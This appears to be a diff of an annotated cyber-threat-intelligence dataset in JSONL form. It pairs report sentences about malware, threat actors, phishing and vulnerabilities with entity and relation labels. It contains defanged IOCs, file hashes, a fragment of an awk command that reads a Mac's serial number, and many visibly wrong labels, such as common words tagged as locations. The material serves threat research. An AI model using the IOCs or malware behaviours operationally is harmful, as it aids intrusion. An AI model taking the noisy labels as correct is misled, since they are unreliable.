'\/IOPlatformSerialNumber\/ { split($0, line, \\\"\\\\\\\"\\\"); printf(\\\"%s\\\", line[4]); }","entities":[],"relations":[],"Comments":[]} +{"id":3760,"text":" This last command downloads a shell script that ultimately downloads and executes an XMRig coinminer.","entities":[{"id":49590,"label":"malware","start_offset":86,"end_offset":101}],"relations":[],"Comments":[]} +{"id":5169,"text":"Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade.","entities":[],"relations":[],"Comments":[]} +{"id":14152,"text":"But as we\u2019ve seen with even ransomware actors, the endpoint is being targeted less.","entities":[],"relations":[],"Comments":[]} +{"id":8991,"text":"Second, one of the Linux rshell samples used the IP address 45[.]142[.]214[.]193 as its C&C.","entities":[{"id":27783,"label":"IPV4","start_offset":60,"end_offset":80}],"relations":[],"Comments":[]} +{"id":2585,"text":"The Lapsus$ Group doesn\u2019t employ malware in breached victim environments, doesn\u2019t encrypt data and in most cases, doesn\u2019t actually employ extortion.","entities":[{"id":47771,"label":"attack-pattern","start_offset":26,"end_offset":40},{"id":47770,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} +{"id":12616,"text":"It will only run at or later than 12:10 PM on any given day; if it is earlier, it will sleep for 15 seconds until it is past the said time.","entities":[{"id":39205,"label":"location","start_offset":3,"end_offset":7},{"id":39206,"label":"location","start_offset":8,"end_offset":12},{"id":39207,"label":"TIME","start_offset":34,"end_offset":42},{"id":39209,"label":"location","start_offset":82,"end_offset":86},{"id":39210,"label":"TIME","start_offset":97,"end_offset":107},{"id":39211,"label":"location","start_offset":134,"end_offset":138}],"relations":[],"Comments":[]} +{"id":3847,"text":"Once ANEL evolved to \u201c5.1.1 rc,\u201d it changed its file type to an executable, while also changing the C&C server.","entities":[{"id":11661,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} +{"id":11507,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor\u2019s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":35205,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":35206,"label":"location","start_offset":51,"end_offset":59},{"id":35208,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":35209,"label":"tools","start_offset":158,"end_offset":164}],"relations":[],"Comments":[]} +{"id":10345,"text":"The code inside the BLUE box constructs the main Powershell commands and scripts.","entities":[{"id":31516,"label":"location","start_offset":20,"end_offset":24},{"id":31517,"label":"attack-pattern","start_offset":49,"end_offset":59},{"id":31518,"label":"location","start_offset":69,"end_offset":72}],"relations":[],"Comments":[]} +{"id":4214,"text":"In addition, the application now retrieves the last known location and uses the development platform Google Firebase to upload the stolen content.","entities":[{"id":50029,"label":"SOFTWARE","start_offset":101,"end_offset":116}],"relations":[],"Comments":[]} +{"id":12322,"text":"We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina.","entities":[],"relations":[],"Comments":[]} +{"id":2984,"text":"This also is an important lesson for kids to understand that privacy on computers isn\u2019t absolute: the admin can always look at what they\u2019re doing.","entities":[],"relations":[],"Comments":[]} +{"id":1831,"text":"Detecting and deleting Mimikatz We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver).","entities":[{"id":5382,"label":"tools","start_offset":23,"end_offset":31},{"id":5383,"label":"tools","start_offset":53,"end_offset":63},{"id":46962,"label":"SOFTWARE","start_offset":144,"end_offset":169},{"id":46963,"label":"FILEPATH","start_offset":117,"end_offset":129},{"id":46964,"label":"attack-pattern","start_offset":71,"end_offset":102}],"relations":[{"id":278,"from_id":46962,"to_id":46963,"type":"consists-of"}],"Comments":[]} +{"id":3730,"text":"On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation.","entities":[{"id":49530,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":49531,"label":"vulnerability","start_offset":118,"end_offset":132},{"id":49533,"label":"SOFTWARE","start_offset":187,"end_offset":203},{"id":49534,"label":"SOFTWARE","start_offset":208,"end_offset":227},{"id":49532,"label":"SOFTWARE","start_offset":158,"end_offset":185},{"id":49528,"label":"TIME","start_offset":3,"end_offset":16},{"id":49529,"label":"identity","start_offset":18,"end_offset":24}],"relations":[{"id":821,"from_id":49532,"to_id":49530,"type":"has"},{"id":822,"from_id":49532,"to_id":49531,"type":"has"},{"id":823,"from_id":49533,"to_id":49530,"type":"has"},{"id":824,"from_id":49533,"to_id":49531,"type":"has"},{"id":825,"from_id":49534,"to_id":49530,"type":"has"},{"id":826,"from_id":49534,"to_id":49531,"type":"has"}],"Comments":[]} +{"id":4048,"text":"After further analysis, we found that the threat group developed multiple backdoors capable of communication via common network protocols.","entities":[],"relations":[],"Comments":[]} +{"id":12487,"text":"We terminated 3,317 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} +{"id":2264,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2022.","entities":[{"id":47333,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} +{"id":1312,"text":"An example upload of these results can be seen below: PlugX PlugX is a backdoor that is often used by actors in targeted attacks.","entities":[{"id":3977,"label":"malware","start_offset":55,"end_offset":60},{"id":3978,"label":"malware","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} +{"id":2917,"text":"In October 2017, Palo Alto Networks Unit 42 published research showing how attackers were adapting attack techniques to generate cryptocurrency for themselves.","entities":[{"id":48089,"label":"TIME","start_offset":3,"end_offset":15},{"id":48090,"label":"identity","start_offset":17,"end_offset":43}],"relations":[],"Comments":[]} +{"id":8675,"text":"Related IOCs supportcdn.web[.]app vegmobile[.]com 111.90.146[.]198","entities":[{"id":26782,"label":"IPV4","start_offset":50,"end_offset":66}],"relations":[],"Comments":[]} +{"id":10195,"text":"During the pandemic, we also uncovered attackers posing as news providers with a \u201cCovid19 news software.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":3253,"text":" Figure 17.","entities":[],"relations":[],"Comments":[]} +{"id":4757,"text":"On Search, Google\u2019s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50662,"label":"SOFTWARE","start_offset":11,"end_offset":33}],"relations":[],"Comments":[]} +{"id":12869,"text":" Figure 2 - A Technique detection named \"Clipboard Data or Screenshot Collection via PowerShell\" was generated when powershell.exe executed CopyFromScreen(). The adversary uses privilege escalation, which commonly involves taking advantage of pre-existing system weaknesses, misconfigurations, and vulnerabilities to gain higher permissions.","entities":[{"id":40092,"label":"attack-pattern","start_offset":46,"end_offset":60},{"id":40093,"label":"attack-pattern","start_offset":90,"end_offset":100},{"id":40094,"label":"attack-pattern","start_offset":186,"end_offset":206},{"id":40095,"label":"location","start_offset":303,"end_offset":306}],"relations":[],"Comments":[]} +{"id":5155,"text":"They're going to buy everything that they need and everything that they see as an opportunity, right?","entities":[],"relations":[],"Comments":[]} +{"id":6624,"text":" https:\/\/attack.mitre.org\/groups\/G0064\/","entities":[],"relations":[],"Comments":[]} +{"id":5793,"text":"Maybe explain to the audience what hybrid warfare or cyber warfare is.","entities":[],"relations":[],"Comments":[]} +{"id":26,"text":"It\u2019s a subject Unit 42 has been tracking in the past year:","entities":[{"id":45810,"label":"identity","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} +{"id":3065,"text":"Since the detection result is fake, the subsequent cleaning is not real either \u2013 the elimination operation is just marking a flag of \"initial_virus_cleared\" to \u201c1\u201d in the app\u2019s internal database.","entities":[],"relations":[],"Comments":[]} +{"id":3971,"text":" As observed on CVE-2020-0688, the use of static keys \u2014 as opposed to randomly generated keys \u2014 can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.","entities":[{"id":49830,"label":"vulnerability","start_offset":16,"end_offset":29},{"id":49831,"label":"attack-pattern","start_offset":121,"end_offset":143}],"relations":[{"id":868,"from_id":49830,"to_id":49831,"type":"uses"}],"Comments":[]} +{"id":1927,"text":"One of the RTF files was found in a server related to Confucius (f1a54dca2fdfe59ec3f537148460364fb5d046c9b4e7db5fc819a9732ae0e063, detected as TROJ_CVE201711882.AG), while the other one (434d34c0502910c562f5c6840694737a2c82a8c44004fa58c7c457b08aac17bd,detected as Mal_CVE20170199-2) downloaded a VB Backdoor that pings back to twitck[.]com, a domain name belonging to Urpage.","entities":[{"id":5662,"label":"SHA2","start_offset":187,"end_offset":251},{"id":5659,"label":"threat-actor","start_offset":54,"end_offset":63},{"id":5660,"label":"SHA2","start_offset":65,"end_offset":129},{"id":47051,"label":"malware","start_offset":143,"end_offset":163},{"id":47052,"label":"malware","start_offset":264,"end_offset":281},{"id":47053,"label":"DOMAIN","start_offset":327,"end_offset":339},{"id":47054,"label":"threat-actor","start_offset":368,"end_offset":374}],"relations":[{"id":293,"from_id":5660,"to_id":5659,"type":"authored-by"},{"id":294,"from_id":47051,"to_id":5660,"type":"related-to"},{"id":295,"from_id":47051,"to_id":5659,"type":"authored-by"},{"id":296,"from_id":5662,"to_id":5659,"type":"authored-by"},{"id":297,"from_id":47052,"to_id":5659,"type":"authored-by"},{"id":298,"from_id":47052,"to_id":47053,"type":"beacons-to"},{"id":299,"from_id":47054,"to_id":47053,"type":"controls"}],"Comments":[]} +{"id":963,"text":"The message body and sender phone number are collected as shown in Figure 2. Figure 2.","entities":[],"relations":[],"Comments":[]} +{"id":744,"text":"Of those vulnerabilities, 4 were actively being exploited in the wild.","entities":[],"relations":[],"Comments":[]} +{"id":915,"text":" Figure 7. HTTP POST request indicating a folder is being scanned This resulted in over 1,000 requests being made on a sandbox machine, which contained little data of interest.","entities":[],"relations":[],"Comments":[]} +{"id":5253,"text":"We analyzed seven apps that were actually AnubisSpy.","entities":[{"id":51294,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} +{"id":3528,"text":"Protux\u2019s latest version, 3.7, uses the open-source compiler OpenCSP to generate a session key with the RSA algorithm.","entities":[{"id":10665,"label":"malware","start_offset":0,"end_offset":6},{"id":49309,"label":"tools","start_offset":60,"end_offset":67}],"relations":[{"id":781,"from_id":10665,"to_id":49309,"type":"uses"}],"Comments":[]} +{"id":5064,"text":"The new technique, displayed below, draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site.","entities":[{"id":51171,"label":"DOMAIN","start_offset":81,"end_offset":94}],"relations":[],"Comments":[]} +{"id":9223,"text":"What happened?","entities":[],"relations":[],"Comments":[]} {"id":7937,"text":"Both methods use a system application called PackageInstaller to complete the installation.","entities":[],"relations":[],"Comments":[]} -{"id":7941,"text":"Let’s take a closer look at what happens.","entities":[],"relations":[],"Comments":[]} -{"id":7948,"text":"Verified with Android OS source code posted in AOSP, it shows that the PackageInstaller on affected versions does not verify the APK file at the “Time of Use”.","entities":[{"id":24631,"label":"attack-pattern","start_offset":25,"end_offset":31},{"id":24632,"label":"location","start_offset":146,"end_offset":150}],"relations":[],"Comments":[]} -{"id":7951,"text":"This method has several stages:","entities":[],"relations":[],"Comments":[]} -{"id":7954,"text":" Method B: Self modifying the APK This exploit can take advantage of the same vulnerability to mask what permissions the app really requires. This vulnerability affects Android device users as well as Android app developers. For Android device users, the users may end up with installing apps that are not the ones they agree to install. Android app developers are also affected, because app-store apps and mobile ads libraries that do not rely on Google Play store would be likely to save the promoted apps in unprotected storage, e.g. \/sdcard.","entities":[{"id":24641,"label":"location","start_offset":48,"end_offset":51},{"id":24642,"label":"location","start_offset":74,"end_offset":78},{"id":24643,"label":"threat-actor","start_offset":96,"end_offset":100},{"id":24644,"label":"location","start_offset":264,"end_offset":267},{"id":24645,"label":"location","start_offset":301,"end_offset":304},{"id":24646,"label":"location","start_offset":365,"end_offset":368},{"id":24647,"label":"location","start_offset":407,"end_offset":410},{"id":24648,"label":"location","start_offset":411,"end_offset":417},{"id":24649,"label":"location","start_offset":479,"end_offset":485},{"id":24650,"label":"location","start_offset":489,"end_offset":493}],"relations":[],"Comments":[]} -{"id":7960,"text":" According to source code posted on the AOSP website, Android 4.3_r0.9 introduced a hash check of the Android manifest that is verified between “Time to Check” and “Time to Use”.","entities":[{"id":24661,"label":"attack-pattern","start_offset":14,"end_offset":20},{"id":24662,"label":"location","start_offset":89,"end_offset":94},{"id":24663,"label":"location","start_offset":110,"end_offset":118},{"id":24664,"label":"location","start_offset":136,"end_offset":143},{"id":24665,"label":"location","start_offset":145,"end_offset":149},{"id":24666,"label":"location","start_offset":153,"end_offset":158},{"id":24667,"label":"location","start_offset":160,"end_offset":163},{"id":24668,"label":"location","start_offset":165,"end_offset":169}],"relations":[],"Comments":[]} -{"id":7962,"text":"For instance, we have successfully tested this exploit on Samsung Galaxy S4 Android phones running Android 4.3 (Build version JSS15J.I337UCUEMK2, Built on Nov. 16, 2013), and Amazon Fire OS version 13.3.2.5.","entities":[{"id":24674,"label":"location","start_offset":171,"end_offset":174},{"id":24676,"label":"IPV4","start_offset":198,"end_offset":206}],"relations":[],"Comments":[]} -{"id":7964,"text":" We encourage all Android device vendors to verify the existence of this vulnerability on their devices including those with Android 4.3.","entities":[],"relations":[],"Comments":[]} -{"id":7966,"text":" Palo Alto Networks has published a vulnerability scanner app in the Google Play store.","entities":[],"relations":[],"Comments":[]} -{"id":7970,"text":" From Google: “Android Open Source Project includes patches for this issue for Android 4.3 and later.","entities":[{"id":24688,"label":"attack-pattern","start_offset":29,"end_offset":35},{"id":24689,"label":"location","start_offset":70,"end_offset":75},{"id":24690,"label":"location","start_offset":92,"end_offset":95}],"relations":[],"Comments":[]} -{"id":7979,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":24726,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} -{"id":7980,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[{"id":24728,"label":"location","start_offset":23,"end_offset":31},{"id":24730,"label":"location","start_offset":113,"end_offset":117},{"id":24731,"label":"location","start_offset":124,"end_offset":130},{"id":24732,"label":"tools","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} -{"id":7981,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":24737,"label":"location","start_offset":85,"end_offset":88},{"id":24739,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} -{"id":7982,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[{"id":24745,"label":"location","start_offset":52,"end_offset":56},{"id":24746,"label":"attack-pattern","start_offset":66,"end_offset":74},{"id":24747,"label":"location","start_offset":75,"end_offset":79},{"id":24750,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} -{"id":7984,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[],"relations":[],"Comments":[]} -{"id":7986,"text":"Cookie Theft, also known as “pass-the-cookie attack,” is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":24762,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} -{"id":7990,"text":"The phishing typically started with a customized email introducing the company and its products.","entities":[{"id":24769,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":24770,"label":"location","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} -{"id":7991,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":24771,"label":"location","start_offset":9,"end_offset":15},{"id":24772,"label":"location","start_offset":30,"end_offset":34},{"id":24773,"label":"location","start_offset":46,"end_offset":53},{"id":24774,"label":"location","start_offset":54,"end_offset":58},{"id":24776,"label":"location","start_offset":141,"end_offset":144},{"id":24778,"label":"attack-pattern","start_offset":193,"end_offset":201}],"relations":[],"Comments":[]} -{"id":7996,"text":"During the pandemic, we also uncovered attackers posing as news providers with a “Covid19 news software.”","entities":[],"relations":[],"Comments":[]} -{"id":7999,"text":"Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.","entities":[{"id":24799,"label":"location","start_offset":32,"end_offset":35},{"id":24800,"label":"attack-pattern","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} -{"id":8004,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.","entities":[{"id":24823,"label":"malware","start_offset":79,"end_offset":86},{"id":24830,"label":"location","start_offset":161,"end_offset":164}],"relations":[],"Comments":[]} +{"id":86,"text":"3. Criminals will find ways to target these attacks.","entities":[],"relations":[],"Comments":[]} +{"id":11192,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten\u2019s objectives.","entities":[{"id":34266,"label":"location","start_offset":5,"end_offset":9},{"id":34268,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} +{"id":3013,"text":"Voice assistants are some of the newest devices out there, which means they\u2019re the least known and understood.","entities":[],"relations":[],"Comments":[]} +{"id":11686,"text":"\u201cIndia reaction after new pak map.pdf\u201d \u2013 a document talking about India\u2019s response to the new political map revealed by Pakistan in August.","entities":[],"relations":[],"Comments":[]} +{"id":7600,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} +{"id":13911,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":1037,"text":"Their response was that they were addressing this issue and have already removed a number of these items, with the remainder requiring further investigation.","entities":[],"relations":[],"Comments":[]} +{"id":4103,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":1738,"text":"Attackers know that people will click on links in email.","entities":[],"relations":[],"Comments":[]} +{"id":5783,"text":"It\u2019s great to be here.","entities":[],"relations":[],"Comments":[]} +{"id":2202,"text":"The filename is derived by randomly choosing an executable name from the system32 directory.","entities":[{"id":47317,"label":"FILEPATH","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} +{"id":662,"text":"Nearly all of us have a use for Microsoft Office documents.","entities":[{"id":46243,"label":"SOFTWARE","start_offset":32,"end_offset":48}],"relations":[],"Comments":[]} +{"id":5036,"text":"The targets, primarily located in Lithuania, were sent links to attacker controlled domains from a domain spoofing the Facebook security team.","entities":[{"id":51110,"label":"identity","start_offset":119,"end_offset":141},{"id":51109,"label":"location","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} +{"id":1669,"text":"At this point, the key exchange is complete and both client and server hold the same two keys, which they can use to encrypt and decrypt traffic.","entities":[],"relations":[],"Comments":[]} +{"id":2137,"text":"Organizations can and should prioritize scheduling and deployment of the security updates based on their security policy and risk assessment, and on currently available information.","entities":[],"relations":[],"Comments":[]} +{"id":1898,"text":"Original (top) and modified (bottom) website","entities":[],"relations":[],"Comments":[]} +{"id":5684,"text":"Since mid-2021, we have been investigating a rather elusive threat actor called Earth Lusca that targets organizations globally via a campaign that uses traditional social engineering techniques such as spear phishing and watering holes.","entities":[{"id":17527,"label":"location","start_offset":134,"end_offset":142},{"id":17528,"label":"attack-pattern","start_offset":203,"end_offset":217},{"id":17529,"label":"location","start_offset":218,"end_offset":221}],"relations":[],"Comments":[]} +{"id":2606,"text":" Owing to the diversity of techniques used, and the lack of use of malware, there is no single defense against or detection of Lapsus$ attacks specifically. ","entities":[{"id":7883,"label":"threat-actor","start_offset":127,"end_offset":134}],"relations":[],"Comments":[]} +{"id":1980,"text":"We can see the first packet is a normal ClientHello sent by the client, and the second packet is a crafted packet sent by the server. In order to examine exploitation of this vulnerability, we used WinDBG to attach to the lsass.exe process.","entities":[{"id":47093,"label":"FILEPATH","start_offset":223,"end_offset":232},{"id":47092,"label":"SOFTWARE","start_offset":199,"end_offset":205}],"relations":[],"Comments":[]} +{"id":1302,"text":"The 'gh204503254' data that was previously downloaded is used as the key.","entities":[],"relations":[],"Comments":[]} +{"id":7246,"text":"Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events.","entities":[{"id":22647,"label":"attack-pattern","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} +{"id":3090,"text":" Security updates to address these vulnerabilities began to be released prior to disclosure on January 3, 2018.","entities":[{"id":45767,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} +{"id":5725,"text":"Attackers will cast a wide net, with no regard to who the victims are, hoping that a decent percentage of attacks are successful.","entities":[{"id":17691,"label":"location","start_offset":10,"end_offset":14},{"id":17692,"label":"identity","start_offset":15,"end_offset":19},{"id":17693,"label":"tools","start_offset":27,"end_offset":30},{"id":17694,"label":"location","start_offset":66,"end_offset":69},{"id":17695,"label":"location","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} +{"id":1757,"text":"And before long, Yuki Chen (@guhe120), a Chinese researcher, posted his answer.","entities":[{"id":46908,"label":"identity","start_offset":28,"end_offset":36},{"id":46907,"label":"identity","start_offset":17,"end_offset":26},{"id":46909,"label":"location","start_offset":41,"end_offset":48}],"relations":[{"id":254,"from_id":46907,"to_id":46908,"type":"duplicate-of"},{"id":255,"from_id":46907,"to_id":46909,"type":"located-at"},{"id":256,"from_id":46908,"to_id":46909,"type":"located-at"}],"Comments":[]} +{"id":14108,"text":"Analyzing the compile time of binaries between different samples can also provide a level of correlation between samples.","entities":[],"relations":[],"Comments":[]} +{"id":2512,"text":"The group has spent more than a year attacking organizations where IT outages can have life-threatening consequences: hospitals, 911 dispatch carriers, emergency medical services and law enforcement agencies.","entities":[],"relations":[],"Comments":[]} +{"id":1304,"text":"The following example response will instruct the malware to download a remote executable file: 'filename.exe' is the path where the downloaded file will be stored, and '01234567890123456789012345678901' is the value supplied in the subsequent HTTP request.","entities":[{"id":46665,"label":"FILEPATH","start_offset":97,"end_offset":109}],"relations":[],"Comments":[]} +{"id":10060,"text":" Figure 10. .satan file Conclusion","entities":[],"relations":[],"Comments":[]} +{"id":9166,"text":"By then, Angler\u2019s activities already ceased.","entities":[],"relations":[],"Comments":[]} +{"id":1090,"text":"In the above example, the resource being protected isn\u2019t the right to speak, as many might think, but rather the ability to listen.","entities":[],"relations":[],"Comments":[]} +{"id":691,"text":"This means that RTF documents expose the same attack surface as Internet Explorer!","entities":[{"id":46269,"label":"SOFTWARE","start_offset":64,"end_offset":81}],"relations":[],"Comments":[]} +{"id":299,"text":"Updated April 1, 2022, at 11 a.m. PT.","entities":[{"id":45999,"label":"TIME","start_offset":8,"end_offset":37}],"relations":[],"Comments":[]} +{"id":10589,"text":"The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.","entities":[],"relations":[],"Comments":[]} +{"id":548,"text":" Ransom notes from Makop, Dharma, Ryuk, DearCry and others, sometimes ask victims to reach out to them via email.","entities":[{"id":46164,"label":"malware","start_offset":19,"end_offset":24},{"id":46166,"label":"malware","start_offset":34,"end_offset":38},{"id":46167,"label":"malware","start_offset":40,"end_offset":47},{"id":46165,"label":"malware","start_offset":26,"end_offset":32}],"relations":[],"Comments":[]} +{"id":11430,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[{"id":34912,"label":"malware","start_offset":83,"end_offset":90},{"id":34913,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} +{"id":1190,"text":" Some of these third-party SDKs provide IAP services based on existing online payment platforms.","entities":[],"relations":[],"Comments":[]} +{"id":3452,"text":" Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":5411,"text":"The vendors that were targeted by VPNFilter were Asus, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZDE.","entities":[{"id":51412,"label":"identity","start_offset":99,"end_offset":103},{"id":51415,"label":"identity","start_offset":135,"end_offset":138},{"id":51409,"label":"identity","start_offset":71,"end_offset":78},{"id":51410,"label":"identity","start_offset":80,"end_offset":88},{"id":51405,"label":"malware","start_offset":34,"end_offset":43},{"id":51406,"label":"identity","start_offset":49,"end_offset":53},{"id":51407,"label":"identity","start_offset":55,"end_offset":61},{"id":51408,"label":"identity","start_offset":63,"end_offset":69},{"id":51411,"label":"identity","start_offset":90,"end_offset":97},{"id":51413,"label":"identity","start_offset":105,"end_offset":112},{"id":51414,"label":"identity","start_offset":114,"end_offset":122}],"relations":[{"id":1084,"from_id":51405,"to_id":51406,"type":"targets"},{"id":1085,"from_id":51405,"to_id":51407,"type":"targets"},{"id":1086,"from_id":51405,"to_id":51408,"type":"targets"},{"id":1087,"from_id":51405,"to_id":51409,"type":"targets"},{"id":1089,"from_id":51405,"to_id":51411,"type":"targets"},{"id":1090,"from_id":51405,"to_id":51412,"type":"targets"},{"id":1091,"from_id":51405,"to_id":51413,"type":"targets"},{"id":1088,"from_id":51405,"to_id":51410,"type":"targets"},{"id":1092,"from_id":51405,"to_id":51414,"type":"targets"},{"id":1093,"from_id":51405,"to_id":51415,"type":"targets"}],"Comments":[]} +{"id":2380,"text":"Many of the StealthMutant samples we have analyzed use AES-256-ECB for decryption; alternatively, an earlier variant of the loader uses XOR.","entities":[{"id":47443,"label":"malware","start_offset":12,"end_offset":25}],"relations":[],"Comments":[]} +{"id":9554,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[],"relations":[],"Comments":[]} +{"id":8181,"text":" Figure 3. Letter confirming the changes in the company\u2019s bank reference.","entities":[],"relations":[],"Comments":[]} +{"id":4514,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50314,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} +{"id":9829,"text":" Figure 6. Code showing down_new\u2019s command function Table 1.","entities":[{"id":29964,"label":"tools","start_offset":25,"end_offset":33}],"relations":[],"Comments":[]} +{"id":4351,"text":" The lures used in an older campaign from April 2021 impersonated the Federal Board of Revenue.","entities":[{"id":50135,"label":"TIME","start_offset":45,"end_offset":55},{"id":50136,"label":"identity","start_offset":73,"end_offset":97}],"relations":[],"Comments":[]} +{"id":8381,"text":"And we don\u2019t just plug security holes \u2013 we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[{"id":25803,"label":"location","start_offset":0,"end_offset":3},{"id":25804,"label":"identity","start_offset":13,"end_offset":17},{"id":25805,"label":"location","start_offset":23,"end_offset":31},{"id":25806,"label":"location","start_offset":101,"end_offset":104}],"relations":[],"Comments":[]} +{"id":725,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":13271,"text":"The loader checking the sidebar process Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":13165,"text":"The malware tries to check if the target machine has a USB plug-in and copies the USBferry installer into the USB storage.","entities":[{"id":41084,"label":"location","start_offset":21,"end_offset":26},{"id":41085,"label":"location","start_offset":34,"end_offset":40},{"id":41086,"label":"location","start_offset":67,"end_offset":70},{"id":41087,"label":"malware","start_offset":82,"end_offset":90}],"relations":[],"Comments":[]} +{"id":4252,"text":" Figure 8: Calling the decryption function This encouraged us to analyze the string encryption routines thoroughly.","entities":[],"relations":[],"Comments":[]} +{"id":13635,"text":"We also recommend that administrators keep the versions of any e-commerce platforms in use by their websites up to date to prevent any potential vulnerabilities, including XSS attacks.","entities":[{"id":51721,"label":"attack-pattern","start_offset":172,"end_offset":183}],"relations":[],"Comments":[]} +{"id":5254,"text":"These were signed with the same fake Google certificates.","entities":[],"relations":[],"Comments":[]} +{"id":4174,"text":"Configuration decoding function (left: SmileSvr right: Troj_Yahamam) Figure 15. Function used to split different values in configuration file (left: SmileSvr right: Troj_Yahamam)","entities":[{"id":49978,"label":"malware","start_offset":170,"end_offset":182},{"id":49979,"label":"malware","start_offset":154,"end_offset":162},{"id":49980,"label":"malware","start_offset":39,"end_offset":47},{"id":49977,"label":"malware","start_offset":55,"end_offset":67}],"relations":[],"Comments":[]} +{"id":3128,"text":"Attackers target home routers like this by targeting default passwords and out-of-date software on the routers.","entities":[{"id":48262,"label":"attack-pattern","start_offset":53,"end_offset":70},{"id":48263,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} +{"id":1049,"text":"There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time.","entities":[{"id":46541,"label":"identity","start_offset":79,"end_offset":105}],"relations":[],"Comments":[]} +{"id":2507,"text":"tomcatlogin.jsp","entities":[{"id":47676,"label":"FILEPATH","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} +{"id":4236,"text":"Microsoft Excel document .ppt, .pptx Microsoft Powerpoint presentation .pptx","entities":[],"relations":[],"Comments":[]} +{"id":1662,"text":"< Data >","entities":[],"relations":[],"Comments":[]} +{"id":5436,"text":"However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor.","entities":[],"relations":[],"Comments":[]} +{"id":5729,"text":"Simply explained: Figure 1 Conversation Hijacking to Deliver Malware Unit 42 observed this specific attack taking advantage of a vulnerability in Microsoft Office, which has a patch available.","entities":[{"id":17711,"label":"identity","start_offset":148,"end_offset":157}],"relations":[],"Comments":[]} +{"id":3417,"text":"BIOPASS RAT Loader 